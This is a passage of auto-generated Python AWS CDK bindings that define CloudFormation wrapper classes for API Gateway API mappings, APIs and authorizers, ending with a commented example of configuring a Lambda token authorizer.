:param props: - resource properties.
:param api_id: ``AWS::ApiGatewayV2::ApiMapping.ApiId``.
:param domain_name: ``AWS::ApiGatewayV2::ApiMapping.DomainName``.
:param stage: ``AWS::ApiGatewayV2::ApiMapping.Stage``.
:param api_mapping_key: ``AWS::ApiGatewayV2::ApiMapping.ApiMappingKey``.
"""
props = CfnApiMappingV2Props(api_id=api_id, domain_name=domain_name, stage=stage, api_mapping_key=api_mapping_key)
jsii.create(CfnApiMappingV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::ApiMapping.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""``AWS::ApiGatewayV2::ApiMapping.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-domainname
"""
return jsii.get(self, "domainName")
@domain_name.setter
def domain_name(self, value: str):
return jsii.set(self, "domainName", value)
@property
@jsii.member(jsii_name="stage")
def stage(self) -> str:
"""``AWS::ApiGatewayV2::ApiMapping.Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-stage
"""
return jsii.get(self, "stage")
@stage.setter
def stage(self, value: str):
return jsii.set(self, "stage", value)
@property
@jsii.member(jsii_name="apiMappingKey")
def api_mapping_key(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::ApiMapping.ApiMappingKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-apimappingkey
"""
return jsii.get(self, "apiMappingKey")
@api_mapping_key.setter
def api_mapping_key(self, value: typing.Optional[str]):
return jsii.set(self, "apiMappingKey", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnApiMappingV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'domain_name': 'domainName', 'stage': 'stage', 'api_mapping_key': 'apiMappingKey'})
class CfnApiMappingV2Props():
def __init__(self, *, api_id: str, domain_name: str, stage: str, api_mapping_key: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::ApiMapping``.
:param api_id: ``AWS::ApiGatewayV2::ApiMapping.ApiId``.
:param domain_name: ``AWS::ApiGatewayV2::ApiMapping.DomainName``.
:param stage: ``AWS::ApiGatewayV2::ApiMapping.Stage``.
:param api_mapping_key: ``AWS::ApiGatewayV2::ApiMapping.ApiMappingKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html
"""
self._values = {
'api_id': api_id,
'domain_name': domain_name,
'stage': stage,
}
if api_mapping_key is not None: self._values["api_mapping_key"] = api_mapping_key
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::ApiMapping.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-apiid
"""
return self._values.get('api_id')
@property
def domain_name(self) -> str:
"""``AWS::ApiGatewayV2::ApiMapping.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-domainname
"""
return self._values.get('domain_name')
@property
def stage(self) -> str:
"""``AWS::ApiGatewayV2::ApiMapping.Stage``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-stage
"""
return self._values.get('stage')
@property
def api_mapping_key(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::ApiMapping.ApiMappingKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-apimapping.html#cfn-apigatewayv2-apimapping-apimappingkey
"""
return self._values.get('api_mapping_key')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnApiMappingV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnApiV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnApiV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Api``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Api
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, name: str, protocol_type: str, route_selection_expression: str, api_key_selection_expression: typing.Optional[str]=None, description: typing.Optional[str]=None, disable_schema_validation: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, tags: typing.Any=None, version: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Api``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param name: ``AWS::ApiGatewayV2::Api.Name``.
:param protocol_type: ``AWS::ApiGatewayV2::Api.ProtocolType``.
:param route_selection_expression: ``AWS::ApiGatewayV2::Api.RouteSelectionExpression``.
:param api_key_selection_expression: ``AWS::ApiGatewayV2::Api.ApiKeySelectionExpression``.
:param description: ``AWS::ApiGatewayV2::Api.Description``.
:param disable_schema_validation: ``AWS::ApiGatewayV2::Api.DisableSchemaValidation``.
:param tags: ``AWS::ApiGatewayV2::Api.Tags``.
:param version: ``AWS::ApiGatewayV2::Api.Version``.
"""
props = CfnApiV2Props(name=name, protocol_type=protocol_type, route_selection_expression=route_selection_expression, api_key_selection_expression=api_key_selection_expression, description=description, disable_schema_validation=disable_schema_validation, tags=tags, version=version)
jsii.create(CfnApiV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGatewayV2::Api.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="name")
def name(self) -> str:
"""``AWS::ApiGatewayV2::Api.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: str):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="protocolType")
def protocol_type(self) -> str:
"""``AWS::ApiGatewayV2::Api.ProtocolType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-protocoltype
"""
return jsii.get(self, "protocolType")
@protocol_type.setter
def protocol_type(self, value: str):
return jsii.set(self, "protocolType", value)
@property
@jsii.member(jsii_name="routeSelectionExpression")
def route_selection_expression(self) -> str:
"""``AWS::ApiGatewayV2::Api.RouteSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-routeselectionexpression
"""
return jsii.get(self, "routeSelectionExpression")
@route_selection_expression.setter
def route_selection_expression(self, value: str):
return jsii.set(self, "routeSelectionExpression", value)
@property
@jsii.member(jsii_name="apiKeySelectionExpression")
def api_key_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Api.ApiKeySelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-apikeyselectionexpression
"""
return jsii.get(self, "apiKeySelectionExpression")
@api_key_selection_expression.setter
def api_key_selection_expression(self, value: typing.Optional[str]):
return jsii.set(self, "apiKeySelectionExpression", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Api.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="disableSchemaValidation")
def disable_schema_validation(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGatewayV2::Api.DisableSchemaValidation``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-disableschemavalidation
"""
return jsii.get(self, "disableSchemaValidation")
@disable_schema_validation.setter
def disable_schema_validation(self, value: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]):
return jsii.set(self, "disableSchemaValidation", value)
@property
@jsii.member(jsii_name="version")
def version(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Api.Version``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-version
"""
return jsii.get(self, "version")
@version.setter
def version(self, value: typing.Optional[str]):
return jsii.set(self, "version", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnApiV2Props", jsii_struct_bases=[], name_mapping={'name': 'name', 'protocol_type': 'protocolType', 'route_selection_expression': 'routeSelectionExpression', 'api_key_selection_expression': 'apiKeySelectionExpression', 'description': 'description', 'disable_schema_validation': 'disableSchemaValidation', 'tags': 'tags', 'version': 'version'})
class CfnApiV2Props():
def __init__(self, *, name: str, protocol_type: str, route_selection_expression: str, api_key_selection_expression: typing.Optional[str]=None, description: typing.Optional[str]=None, disable_schema_validation: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, tags: typing.Any=None, version: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Api``.
:param name: ``AWS::ApiGatewayV2::Api.Name``.
:param protocol_type: ``AWS::ApiGatewayV2::Api.ProtocolType``.
:param route_selection_expression: ``AWS::ApiGatewayV2::Api.RouteSelectionExpression``.
:param api_key_selection_expression: ``AWS::ApiGatewayV2::Api.ApiKeySelectionExpression``.
:param description: ``AWS::ApiGatewayV2::Api.Description``.
:param disable_schema_validation: ``AWS::ApiGatewayV2::Api.DisableSchemaValidation``.
:param tags: ``AWS::ApiGatewayV2::Api.Tags``.
:param version: ``AWS::ApiGatewayV2::Api.Version``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html
"""
self._values = {
'name': name,
'protocol_type': protocol_type,
'route_selection_expression': route_selection_expression,
}
if api_key_selection_expression is not None: self._values["api_key_selection_expression"] = api_key_selection_expression
if description is not None: self._values["description"] = description
if disable_schema_validation is not None: self._values["disable_schema_validation"] = disable_schema_validation
if tags is not None: self._values["tags"] = tags
if version is not None: self._values["version"] = version
@property
def name(self) -> str:
"""``AWS::ApiGatewayV2::Api.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-name
"""
return self._values.get('name')
@property
def protocol_type(self) -> str:
"""``AWS::ApiGatewayV2::Api.ProtocolType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-protocoltype
"""
return self._values.get('protocol_type')
@property
def route_selection_expression(self) -> str:
"""``AWS::ApiGatewayV2::Api.RouteSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-routeselectionexpression
"""
return self._values.get('route_selection_expression')
@property
def api_key_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Api.ApiKeySelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-apikeyselectionexpression
"""
return self._values.get('api_key_selection_expression')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Api.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-description
"""
return self._values.get('description')
@property
def disable_schema_validation(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGatewayV2::Api.DisableSchemaValidation``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-disableschemavalidation
"""
return self._values.get('disable_schema_validation')
@property
def tags(self) -> typing.Any:
"""``AWS::ApiGatewayV2::Api.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-tags
"""
return self._values.get('tags')
@property
def version(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Api.Version``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-api.html#cfn-apigatewayv2-api-version
"""
return self._values.get('version')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnApiV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnAuthorizer(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnAuthorizer"):
"""A CloudFormation ``AWS::ApiGateway::Authorizer``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Authorizer
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api_id: str, type: str, authorizer_credentials: typing.Optional[str]=None, authorizer_result_ttl_in_seconds: typing.Optional[jsii.Number]=None, authorizer_uri: typing.Optional[str]=None, auth_type: typing.Optional[str]=None, identity_source: typing.Optional[str]=None, identity_validation_expression: typing.Optional[str]=None, name: typing.Optional[str]=None, provider_arns: typing.Optional[typing.List[str]]=None) -> None:
"""Create a new ``AWS::ApiGateway::Authorizer``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param rest_api_id: ``AWS::ApiGateway::Authorizer.RestApiId``.
:param type: ``AWS::ApiGateway::Authorizer.Type``.
:param authorizer_credentials: ``AWS::ApiGateway::Authorizer.AuthorizerCredentials``.
:param authorizer_result_ttl_in_seconds: ``AWS::ApiGateway::Authorizer.AuthorizerResultTtlInSeconds``.
:param authorizer_uri: ``AWS::ApiGateway::Authorizer.AuthorizerUri``.
:param auth_type: ``AWS::ApiGateway::Authorizer.AuthType``.
:param identity_source: ``AWS::ApiGateway::Authorizer.IdentitySource``.
:param identity_validation_expression: ``AWS::ApiGateway::Authorizer.IdentityValidationExpression``.
:param name: ``AWS::ApiGateway::Authorizer.Name``.
:param provider_arns: ``AWS::ApiGateway::Authorizer.ProviderARNs``.
"""
props = CfnAuthorizerProps(rest_api_id=rest_api_id, type=type, authorizer_credentials=authorizer_credentials, authorizer_result_ttl_in_seconds=authorizer_result_ttl_in_seconds, authorizer_uri=authorizer_uri, auth_type=auth_type, identity_source=identity_source, identity_validation_expression=identity_validation_expression, name=name, provider_arns=provider_arns)
jsii.create(CfnAuthorizer, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Authorizer.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="type")
def type(self) -> str:
"""``AWS::ApiGateway::Authorizer.Type``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-type
"""
return jsii.get(self, "type")
@type.setter
def type(self, value: str):
return jsii.set(self, "type", value)
@property
@jsii.member(jsii_name="authorizerCredentials")
def authorizer_credentials(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.AuthorizerCredentials``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authorizercredentials
"""
return jsii.get(self, "authorizerCredentials")
@authorizer_credentials.setter
def authorizer_credentials(self, value: typing.Optional[str]):
return jsii.set(self, "authorizerCredentials", value)
@property
@jsii.member(jsii_name="authorizerResultTtlInSeconds")
def authorizer_result_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGateway::Authorizer.AuthorizerResultTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authorizerresultttlinseconds
"""
return jsii.get(self, "authorizerResultTtlInSeconds")
@authorizer_result_ttl_in_seconds.setter
def authorizer_result_ttl_in_seconds(self, value: typing.Optional[jsii.Number]):
return jsii.set(self, "authorizerResultTtlInSeconds", value)
@property
@jsii.member(jsii_name="authorizerUri")
def authorizer_uri(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.AuthorizerUri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authorizeruri
"""
return jsii.get(self, "authorizerUri")
@authorizer_uri.setter
def authorizer_uri(self, value: typing.Optional[str]):
return jsii.set(self, "authorizerUri", value)
@property
@jsii.member(jsii_name="authType")
def auth_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.AuthType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authtype
"""
return jsii.get(self, "authType")
@auth_type.setter
def auth_type(self, value: typing.Optional[str]):
return jsii.set(self, "authType", value)
@property
@jsii.member(jsii_name="identitySource")
def identity_source(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.IdentitySource``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-identitysource
"""
return jsii.get(self, "identitySource")
@identity_source.setter
def identity_source(self, value: typing.Optional[str]):
return jsii.set(self, "identitySource", value)
@property
@jsii.member(jsii_name="identityValidationExpression")
def identity_validation_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.IdentityValidationExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-identityvalidationexpression
"""
return jsii.get(self, "identityValidationExpression")
@identity_validation_expression.setter
def identity_validation_expression(self, value: typing.Optional[str]):
return jsii.set(self, "identityValidationExpression", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: typing.Optional[str]):
return jsii.set(self, "name", value)
@property
@jsii.member(jsii_name="providerArns")
def provider_arns(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGateway::Authorizer.ProviderARNs``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-providerarns
"""
return jsii.get(self, "providerArns")
@provider_arns.setter
def provider_arns(self, value: typing.Optional[typing.List[str]]):
return jsii.set(self, "providerArns", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnAuthorizerProps", jsii_struct_bases=[], name_mapping={'rest_api_id': 'restApiId', 'type': 'type', 'authorizer_credentials': 'authorizerCredentials', 'authorizer_result_ttl_in_seconds': 'authorizerResultTtlInSeconds', 'authorizer_uri': 'authorizerUri', 'auth_type': 'authType', 'identity_source': 'identitySource', 'identity_validation_expression': 'identityValidationExpression', 'name': 'name', 'provider_arns': 'providerArns'})
class CfnAuthorizerProps():
def __init__(self, *, rest_api_id: str, type: str, authorizer_credentials: typing.Optional[str]=None, authorizer_result_ttl_in_seconds: typing.Optional[jsii.Number]=None, authorizer_uri: typing.Optional[str]=None, auth_type: typing.Optional[str]=None, identity_source: typing.Optional[str]=None, identity_validation_expression: typing.Optional[str]=None, name: typing.Optional[str]=None, provider_arns: typing.Optional[typing.List[str]]=None):
"""Properties for defining a ``AWS::ApiGateway::Authorizer``.
:param rest_api_id: ``AWS::ApiGateway::Authorizer.RestApiId``.
:param type: ``AWS::ApiGateway::Authorizer.Type``.
:param authorizer_credentials: ``AWS::ApiGateway::Authorizer.AuthorizerCredentials``.
:param authorizer_result_ttl_in_seconds: ``AWS::ApiGateway::Authorizer.AuthorizerResultTtlInSeconds``.
:param authorizer_uri: ``AWS::ApiGateway::Authorizer.AuthorizerUri``.
:param auth_type: ``AWS::ApiGateway::Authorizer.AuthType``.
:param identity_source: ``AWS::ApiGateway::Authorizer.IdentitySource``.
:param identity_validation_expression: ``AWS::ApiGateway::Authorizer.IdentityValidationExpression``.
:param name: ``AWS::ApiGateway::Authorizer.Name``.
:param provider_arns: ``AWS::ApiGateway::Authorizer.ProviderARNs``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html
"""
self._values = {
'rest_api_id': rest_api_id,
'type': type,
}
if authorizer_credentials is not None: self._values["authorizer_credentials"] = authorizer_credentials
if authorizer_result_ttl_in_seconds is not None: self._values["authorizer_result_ttl_in_seconds"] = authorizer_result_ttl_in_seconds
if authorizer_uri is not None: self._values["authorizer_uri"] = authorizer_uri
if auth_type is not None: self._values["auth_type"] = auth_type
if identity_source is not None: self._values["identity_source"] = identity_source
if identity_validation_expression is not None: self._values["identity_validation_expression"] = identity_validation_expression
if name is not None: self._values["name"] = name
if provider_arns is not None: self._values["provider_arns"] = provider_arns
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Authorizer.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-restapiid
"""
return self._values.get('rest_api_id')
@property
def type(self) -> str:
"""``AWS::ApiGateway::Authorizer.Type``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-type
"""
return self._values.get('type')
@property
def authorizer_credentials(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.AuthorizerCredentials``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authorizercredentials
"""
return self._values.get('authorizer_credentials')
@property
def authorizer_result_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``AWS::ApiGateway::Authorizer.AuthorizerResultTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authorizerresultttlinseconds
"""
return self._values.get('authorizer_result_ttl_in_seconds')
@property
def authorizer_uri(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.AuthorizerUri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authorizeruri
"""
return self._values.get('authorizer_uri')
@property
def auth_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.AuthType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-authtype
"""
return self._values.get('auth_type')
@property
def identity_source(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.IdentitySource``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-identitysource
"""
return self._values.get('identity_source')
@property
def identity_validation_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.IdentityValidationExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-identityvalidationexpression
"""
return self._values.get('identity_validation_expression')
@property
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Authorizer.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-name
"""
return self._values.get('name')
@property
def provider_arns(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGateway::Authorizer.ProviderARNs``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-authorizer.html#cfn-apigateway-authorizer-providerarns
"""
return self._values.get('provider_arns')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnAuthorizerProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
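# Illustrative usage sketch (editorial addition, not generated output). The
# stack name, REST API id, and Lambda ARN below are placeholders. A TOKEN
# authorizer reads the caller's identity from a request header and delegates
# validation to the Lambda function named by ``authorizer_uri``:
#
#     import aws_cdk.core as core
#     import aws_cdk.aws_apigateway as apigw
#
#     app = core.App()
#     stack = core.Stack(app, "AuthorizerStack")
#     apigw.CfnAuthorizer(stack, "TokenAuthorizer",
#         rest_api_id="abc123",   # placeholder REST API id
#         type="TOKEN",           # TOKEN | REQUEST | COGNITO_USER_POOLS
#         name="token-authorizer",
#         identity_source="method.request.header.Authorization",
#         authorizer_uri="arn:aws:apigateway:us-east-1:lambda:path/2015-03-31/functions/<lambda-arn>/invocations",
#         authorizer_result_ttl_in_seconds=300,  # cache policy decisions for 5 minutes
#     )
#     app.synth()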
@jsii.implements(aws_cdk.core.IInspectable)
